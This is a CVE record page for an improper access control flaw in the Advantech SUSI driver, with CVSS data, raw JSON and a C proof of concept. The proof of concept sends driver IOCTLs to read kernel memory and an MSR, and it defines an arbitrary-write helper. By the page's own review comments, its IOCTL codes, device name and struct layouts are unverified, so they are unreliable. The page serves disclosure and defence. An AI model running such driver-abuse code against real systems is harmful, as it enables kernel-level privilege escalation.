Security Vulnerability Report
CVE-2025-14252 CVSS 7.8 HIGH

CVE-2025-14252

Published: 2025-12-16 06:15:43
Last Modified: 2026-04-15 00:35:42
Source: 3ad20294-822c-4ebc-9301-f9a7cf62d46e

Description

An Improper Access Control vulnerability in Advantech SUSI driver (susi.sys) allows attackers to read/write arbitrary memory, I/O ports, and MSRs, resulting in privilege escalation, arbitrary code execution, and information disclosure. This issue affects Advantech SUSI: 5.0.24335 and prior.

CVSS Details

CVSS Score (v3.1)
7.8 (the raw record below also lists a CVSS 4.0 base score of 8.5)
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No structured configuration data available; the affected range below is taken from the description.

Advantech SUSI <= 5.0.24335

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
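/*
 * CVE-2025-14252 PoC - Advantech SUSI Driver Privilege Escalation
 * This PoC demonstrates improper access control in the susi.sys driver.
 *
 * What it shows: a local process opens the driver's device object and sends
 * IOCTLs asking the driver to read memory and a model-specific register on
 * its behalf. The CVE record rates this PR:L, so no elevated rights are
 * assumed for the caller.
 *
 * NOTE(review): the IOCTL codes, the device name and the request structure
 * layouts below are not corroborated by the CVE record on this page. Treat
 * them as illustrative until they are checked against the referenced
 * advisory; a failed request with these values does not prove that a host
 * is unaffected.
 *
 * Defensive reading: the weakness is that the driver serves raw
 * memory / I/O-port / MSR access to any caller able to open the device.
 * Drivers normally close this class of issue by creating the device with a
 * restrictive security descriptor (for example via IoCreateDeviceSecure) and
 * by not exposing unrestricted read/write primitives at all. On the
 * operations side, hosts running SUSI 5.0.24335 or earlier are in scope per
 * the description, and handle opens on the driver's device from processes
 * that are not part of the vendor software are worth alerting on.
 */
#include <windows.h>
#include <stdio.h>

/* NOTE(review): unverified control codes - confirm against the advisory. */
#define SUSI_IOCTL_BASE          0x9A406800
#define SUSI_IOCTL_READ_MEMORY   (SUSI_IOCTL_BASE + 0x100)
#define SUSI_IOCTL_WRITE_MEMORY  (SUSI_IOCTL_BASE + 0x104)
#define SUSI_IOCTL_READ_MSR      (SUSI_IOCTL_BASE + 0x200)
#define SUSI_IOCTL_WRITE_MSR     (SUSI_IOCTL_BASE + 0x204)

/* Device name for SUSI driver. NOTE(review): unverified, see file header. */
#define SUSI_DEVICE "\\\\.\\SUSI"

/* Input buffer for the memory IOCTLs. NOTE(review): layout is assumed. */
typedef struct _SUSI_MEMORY_REQUEST {
    ULONG64 Address;   /* address the driver is asked to access */
    ULONG64 Value;     /* value to store; only set by the write helper */
    ULONG   Size;      /* access width in bytes; the helpers always pass 8 */
} SUSI_MEMORY_REQUEST, *PSUSI_MEMORY_REQUEST;

/* Input buffer for the MSR IOCTLs. NOTE(review): layout is assumed. */
typedef struct _SUSI_MSR_REQUEST {
    ULONG   MsrIndex;  /* MSR number */
    ULONG64 Value;     /* unused by read_msr below */
} SUSI_MSR_REQUEST, *PSUSI_MSR_REQUEST;

/*
 * Open the driver's device object for read/write access.
 *
 * Returns the handle from CreateFileA, or INVALID_HANDLE_VALUE on failure.
 * The caller owns the handle and must release it with CloseHandle.
 */
HANDLE open_susi_driver(void)
{
    return CreateFileA(SUSI_DEVICE,
                       GENERIC_READ | GENERIC_WRITE,
                       FILE_SHARE_READ | FILE_SHARE_WRITE,
                       NULL,
                       OPEN_EXISTING,
                       0,
                       NULL);
}

/*
 * Ask the driver to read 8 bytes at `address` into `*value`.
 *
 * Returns the DeviceIoControl result. bytesReturned is not inspected, so a
 * TRUE result only means the request completed, not that 8 bytes came back.
 */
BOOL read_arbitrary_memory(HANDLE hDevice, ULONG64 address, PULONG64 value)
{
    SUSI_MEMORY_REQUEST request = {0};
    request.Address = address;
    request.Size = 8;

    DWORD bytesReturned = 0;
    return DeviceIoControl(hDevice, SUSI_IOCTL_READ_MEMORY,
                           &request, sizeof(request),
                           value, sizeof(ULONG64),
                           &bytesReturned, NULL);
}

/*
 * Ask the driver to store the 8-byte `value` at `address`.
 *
 * Defined for completeness; main() below never calls it.
 * Returns the DeviceIoControl result.
 */
BOOL write_arbitrary_memory(HANDLE hDevice, ULONG64 address, ULONG64 value)
{
    SUSI_MEMORY_REQUEST request = {0};
    request.Address = address;
    request.Value = value;
    request.Size = 8;

    DWORD bytesReturned = 0;
    return DeviceIoControl(hDevice, SUSI_IOCTL_WRITE_MEMORY,
                           &request, sizeof(request),
                           NULL, 0,
                           &bytesReturned, NULL);
}

/*
 * Ask the driver to read MSR `msrIndex` into `*value`.
 *
 * Returns the DeviceIoControl result; bytesReturned is not inspected.
 */
BOOL read_msr(HANDLE hDevice, ULONG msrIndex, PULONG64 value)
{
    SUSI_MSR_REQUEST request = {0};
    request.MsrIndex = msrIndex;

    DWORD bytesReturned = 0;
    return DeviceIoControl(hDevice, SUSI_IOCTL_READ_MSR,
                           &request, sizeof(request),
                           value, sizeof(ULONG64),
                           &bytesReturned, NULL);
}

/*
 * Open the device, attempt one memory read and one MSR read, and print the
 * results. Read-only: nothing is written to memory or to any MSR.
 *
 * Returns 0 once the device has been opened (whether or not the reads
 * succeed) and -1 when the device cannot be opened.
 */
int main(void)
{
    printf("[*] CVE-2025-14252 PoC - Advantech SUSI Driver\n");
    printf("[*] Improper Access Control in susi.sys\n\n");

    HANDLE hDevice = open_susi_driver();
    if (hDevice == INVALID_HANDLE_VALUE) {
        /* Driver absent, device name wrong, or the open was denied. */
        printf("[-] Failed to open SUSI driver\n");
        return -1;
    }

    printf("[+] Successfully opened SUSI driver\n");

    /*
     * Demonstrate arbitrary memory read (read kernel memory).
     * 0xFFFFF78000000000 is a fixed kernel-mode address on x64 Windows,
     * commonly documented as the KUSER_SHARED_DATA mapping. It is not the
     * base of kernel space, as the original comment suggested.
     */
    ULONG64 kernelAddr = 0xFFFFF78000000000ULL;
    ULONG64 readValue = 0;
    if (read_arbitrary_memory(hDevice, kernelAddr, &readValue)) {
        printf("[+] Arbitrary kernel memory read successful\n");
        printf(" Address: 0x%llx, Value: 0x%llx\n", kernelAddr, readValue);
    }

    /* Demonstrate MSR read (read IA32_LSTAR MSR - Syscall entry point). */
    ULONG64 msrValue = 0;
    if (read_msr(hDevice, 0xC0000082, &msrValue)) { /* IA32_LSTAR */
        printf("[+] Arbitrary MSR read successful\n");
        printf(" MSR 0xC0000082 (IA32_LSTAR): 0x%llx\n", msrValue);
    }

    CloseHandle(hDevice);

    printf("\n[!] This PoC demonstrates the vulnerability.\n");
    printf("[!] Real exploitation would involve privilege escalation.\n");
    return 0;
}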

References

https://www.txone.com/psirt/advisories/CVE-2025-14252 (from the raw record below)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14252", "sourceIdentifier": "3ad20294-822c-4ebc-9301-f9a7cf62d46e", "published": "2025-12-16T06:15:42.557", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Improper Access Control vulnerability in Advantech SUSI driver (susi.sys) allows attackers to read/write arbitrary memory, I/O ports, and MSRs, resulting in privilege escalation, arbitrary code execution, and information disclosure. This issue affects Advantech SUSI: 5.0.24335 and prior."}], "metrics": {"cvssMetricV40": [{"source": "3ad20294-822c-4ebc-9301-f9a7cf62d46e", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": 
"NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "3ad20294-822c-4ebc-9301-f9a7cf62d46e", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-269"}]}], "references": [{"url": "https://www.txone.com/psirt/advisories/CVE-2025-14252", "source": "3ad20294-822c-4ebc-9301-f9a7cf62d46e"}]}}